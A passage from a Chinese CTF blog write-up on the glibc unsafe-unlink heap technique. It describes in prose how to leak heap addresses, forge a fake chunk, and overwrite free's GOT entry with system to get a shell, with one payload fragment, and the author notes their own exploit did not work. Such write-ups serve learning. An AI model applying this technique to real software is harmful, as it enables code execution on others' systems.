<p>也就是说我们可以只输入8个字符，之前空闲状态的块的bk指针将不会被覆盖，而且当我们输出块的内容的时候则会将将它输出.</p>
<p>当我们释放两个不相邻的大于等于0x80的块的时候（相邻会被合并，小于0x80会被并入fastbins，fastbins不是双向链表，而且在这个题目中最小的申请单位是0x80），将两个空块并入bins，如下图：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/20190902233014831.png" alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220105223409450.png" alt="image-20220105223409450"></p>
<p>两个块的bk指针是我们可以通过输出“带”出来的，左面块的bk指针指向右面块的地址，而块处在堆中，我们就可以知道右面块处在堆中的地址，根据计算我们就可以知道堆的起始地址。所以我们只需申请4个块，然后释放其中的第0和第2连个块，那么就会构造出一个这种场景，然后通过输出note0就可以带出note2的地址，那么根据栈结构就可以计算出栈起始地址：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220105213710880.png" alt="image-20220105213710880"></p>
<p>0x1820+0x90+0x90=0x1940，也就是说，note2对于堆起始地址偏移为0x1940</p>
<p>上上个图右面块指向的是bins的索引，它处在main_arena中，具体的位置在libc中的malloc_hook字段</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220105220942298.png" alt="image-20220105220942298"></p>
<p>也就是说，再之前init__函数中初始化申请的大小为0x1810的note索引中能找到指向note0的指针，但注意指针指向的位置是块内容开始的地方，也就是空块中fd的位置。而在检测中本应该指向的应该是块的开头，也就是presize的地方。所以我们要在这里伪造一个假的块：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220105222108043.png" alt="image-20220105222108043"></p>
<p>需要在之前申请的note0和note1都释放的状态下申请一个大小为note0+note1的块，然后内容如图中所构造。由于之前释放的note1的指针仍然存在，第二次释放note1就会引发unlink，而我们构造的fake fd和bk正好能通过检测，然后就会执行unlink：</p>
<pre class=" language-lang-c"><code class="language-lang-c">P->fd->bk= P->bk
P->bk->fd= P->fd
</code></pre>
<p>unlink后则为这样</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220105222242736.png" alt="image-20220105222242736"></p>
<p>指向note0的指针改为了指向自己上面三个单位的地址，这时我们只要修改note0就会覆盖note0，比如我们将note0修改为p64(0)+p64(0)+p64(0)+p64(free_got)就会变成：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220105222507126.png" alt="image-20220105222507126"></p>
<p>然后修改got表中free为system，之后调用free直接变成system，则删除第0块就可以getshell</p>
<p>漏洞的利用思路大致就是这些，但是写exp的时候没有打通，可能细节上存在一些问题。</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="http://wysyrg.github.io">chuwei</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://wysyrg.github.io/2022/08/06/unsafe_unlink/">http://wysyrg.github.io/2022/08/06/unsafe_unlink/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://wysyrg.github.io" target="_blank">chuwei'blog</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="/img/973119.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2022/08/06/unsorted%20bin%20attack/"><img class="prev-cover" src="/img/973119.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">unsorted bin attack</div></div></a></div><div class="next-post pull-right"><a href="/2022/08/06/tcache/"><img class="next-cover" src="/img/973119.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">tcache</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#unsafe-unlink"><span class="toc-number">1.</span> <span class="toc-text">unsafe_unlink</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#unlink%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6"><span class="toc-number">1.1.</span> <span class="toc-text">unlink利用条件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#unlink%E6%BA%90%E7%A0%81"><span class="toc-number">1.2.</span> <span class="toc-text">unlink源码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#unlink%E5%AE%8F%E5%AE%9A%E4%B9%89"><span class="toc-number">1.3.</span> <span class="toc-text">unlink宏定义</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%A7%E5%B0%8F%E6%A3%80%E6%9F%A5"><span class="toc-number">1.4.</span> <span class="toc-text">大小检查</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%8C%E5%90%91%E9%93%BE%E8%A1%A8%E5%AE%8C%E6%95%B4%E6%80%A7%E6%A3%80%E6%9F%A5"><span class="toc-number">1.5.</span> <span class="toc-text">双向链表完整性检查</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BB%A1%E8%B6%B3%E4%BB%A5%E4%B8%8A%E6%9D%A1%E4%BB%B6%E5%90%8E%EF%BC%8C%E8%BF%9B%E5%85%A5unlink%E8%84%B1%E9%93%BE%E7%8E%AF%E8%8A%82%EF%BC%9A"><span class="toc-number">1.6.</span> <span class="toc-text">满足以上条件后，进入unlink脱链环节：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8B%A5%E4%B8%BAlargebin-%E8%BF%98%E9%A1%BB%E8%BF%9B%E8%A1%8C%E8%BF%9B%E4%B8%80%E6%AD%A5%E6%93%8D%E4%BD%9C"><span class="toc-number">1.7.</span> <span class="toc-text">若为largebin,还须进行进一步操作</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#how2heap%E7%9A%84unlink%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">how2heap的unlink分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98"><span class="toc-number">3.</span> <span class="toc-text">例题</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A6%96%E5%85%88%E5%AF%B9%E7%A8%8B%E5%BA%8F%E8%BF%9B%E8%A1%8C%E6%A3%80%E6%9F%A5"><span class="toc-number">3.1.</span> <span class="toc-text">首先对程序进行检查</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%9B%E5%85%A5ida%E5%AF%B9%E5%87%BD%E6%95%B0%E8%BF%9B%E8%A1%8C%E5%88%86%E6%9E%90"><span class="toc-number">3.2.</span> <span class="toc-text">进入ida对函数进行分析</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%9D%E5%A7%8B%E5%8C%96"><span class="toc-number">3.2.1.</span> <span class="toc-text">初始化</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%BE%93%E5%87%BAnote%E4%BF%A1%E6%81%AF%EF%BC%9A"><span class="toc-number">3.2.2.</span> <span class="toc-text">输出note信息：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%B0%E5%A2%9Enote"><span class="toc-number">3.2.3.</span> <span class="toc-text">新增note</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BF%AE%E6%94%B9note"><span class="toc-number">3.2.4.</span> <span class="toc-text">修改note</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A0%E9%99%A4note"><span class="toc-number">3.2.5.</span> <span class="toc-text">删除note</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF"><span class="toc-number">3.3.</span> <span class="toc-text">漏洞利用思路</span></a></li></ol></li></ol></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2022 By chuwei</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><div class="js-pjax"></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>